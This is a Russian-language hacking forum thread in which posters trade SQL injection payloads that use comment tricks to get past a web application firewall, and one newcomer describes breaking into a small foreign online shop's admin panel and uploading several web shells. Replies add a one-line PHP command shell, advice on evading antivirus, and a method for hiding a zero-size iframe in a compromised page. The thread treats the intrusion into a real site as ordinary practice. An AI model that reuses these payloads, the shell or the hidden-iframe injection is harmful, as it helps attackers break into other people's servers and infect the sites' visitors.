А зачем крутить скуль на алиасах? Алиасы на другом сервере? Если на одном, то заливай шелл и получишь доступ и к алиасам. А что касается фильтра, то urlencode пробуй или поиграйся с регистром букв в запросах.
WAF, судя по всему. Некоторые варианты из многих возможных: HTML: -9999+/*!12345union*/+/*!12345select*/+1,2,table_name,4,5+/*!12345from*/+information_schema.tables HTML: -9999+/*!union+select+1,2,table_name,4,5+from+information_schema.tables*/ HTML: -9999+/*%00*/union/*%00*/+/*%00*/select/*%00*/+1,2,table_name,4,5+/*%00*/from/*%00*/+information_schema.tables HTML: -9999+/*!union*/+/*!select*/+1,2,table_name,4,5+/*!from*/+information_schema.tables HTML: -9999/*!union+select+1,2,table_name,4,5+'aaa'from+information_schema.tables*/ Либо если есть возможность, то отправлять POST' ом, либо подзапросы.
Всем привет! Я недавно начал изучать эту тему, поэтому прошу строго не ругать, если допущу какие-либо неточности в терминологии. Вобщем такой вопрос: Добыл доступ к админки одного маленького буржуйского шопа, нашел способ залить через нее веб шелл. Залил последнюю версию wso 2, захожу на шелл, а у меня там ограничено все, что только можно: Safe-mode: ON open_basedir, где прописан только адрес папки в которой лежит шелл + папки /tmp Chmod: ---------, т.е. походу вообще ничего нельзя делать Залил другой шелл: c99 от madnet - тоже самое. Залил шелл r57 от wolfa - все стало гораздо лучше: Safe-mode: OFF open_basedir - нет ограничений Chmod:drwxrwxrwx Что не так с двумя первыми шеллами? Просто имхо r57 самый неюзабельный. P.S. Chmod я указывал тот, что стоит рядом с адресом директории, в которую залит шелл.
да н еможет быть такого что при первых двух сейф мод он а на р57 офф, это настройки сервера и накак не шелла..что то нереальное говоришь...и еще чем это неюзабельный р57? вообще самый юзабельный шелл <? system($_GET[cmd]); ?>
Ладно, отбросим вопрос о юзабельности того или иного шелла. Это дело вкуса и опыта. Меня больше интересует, почему ограничения при разных залитых шеллах разные. Ты говоришь, что этого не может быть, но тем не мене так есть. Меня это тоже очень сильно удивило. А, вот еще чем мне не нравится r57: он дико палится антивирусами, а тот же wso2 мой касперский пока не замечает.
А почему она должна умереть?)) Находи тот участок кода, который выводит текст на страницу. Например контакты организации. И в конце строки вставляй свой iframe, только не забудь поставить width и height в ноль и visible:no.
Нет не пробовал. Я собственно начал учится этой теме только неделю назад. Читал много статей на тематических форумах и ни в одной из них не поднимался вопрос криптовки веб шеллов. Так что спасибо, буду разбираться и с этим вопросом.
Бывает что фаервол так настроен что ВСО и МАД палятца и полная жопа способов обойти пока не нашел=), а р57 работает (он кстате реально более практичный и функциональный, а то что палитца анвирам, ты его wget'ом просто на сервак, и не какой запары с криптовкой )
manmerritt0, что ты про Safe_mode написал - такого точно не может быть. механизм получения значения "Safe_mode" одинаковый: $safe_mode = @ini_get('safe_mode'); может, когда ты залил первые два шелла, safe_mode было On, а потом админ поставил в Off, и ты как раз залил r57 ) В такое я скорее поверю )
во всех шеллах есть методы обхода сейф мода...но не так что бы на серванте поменять..а файлы почитать, в другую папку перепрыгнуть и тд и тп... если бы шеллы могли настройки сервера менять то и рутать не надо было бы никогда
кстати, после заливки шелла буквально через 10 минут sql уязвимость, через которую были добыты пароли, исчезла. Врядли админы будут выключать safe_mod после того, как увидели уязвимость. Тем более, что у меня там сейчас залито все 3 шелла(wso2,c99,r57) и все также:на 2-х safemod on, на r57-off А и правда, что насчет фаерволлов и антивирусов? Я сам задумывался над этим, но информации не нашел. Может на том сервере стоят определенные средства защиты, которые по тем или иным причинам палят только wso2 и c99? Только что случайно заметил, что на сервере есть юзер drweb. Он может быть причиной таких непоняток? Но почему тогда он пропустил r57?
я же тебе сказал продолжай крутить.крутить скулю значит что ты уже нашел багу и в процесе раскручивания уязвимости у тебя появляется надпись "hacking attempt"..это означает что там стоит какой нить фильтр..и тебе прийдется его обойти..... если конечно ты не мега кул хацкер и просто подставил ковычку и и назвал это раскручивать скуль !!! вопрос из разряда нубских..и я очень удивлен что твой пост еще жив ..так мало того еще и ап ему сделал... Но Слава Богу 1 сентября уже скоро....
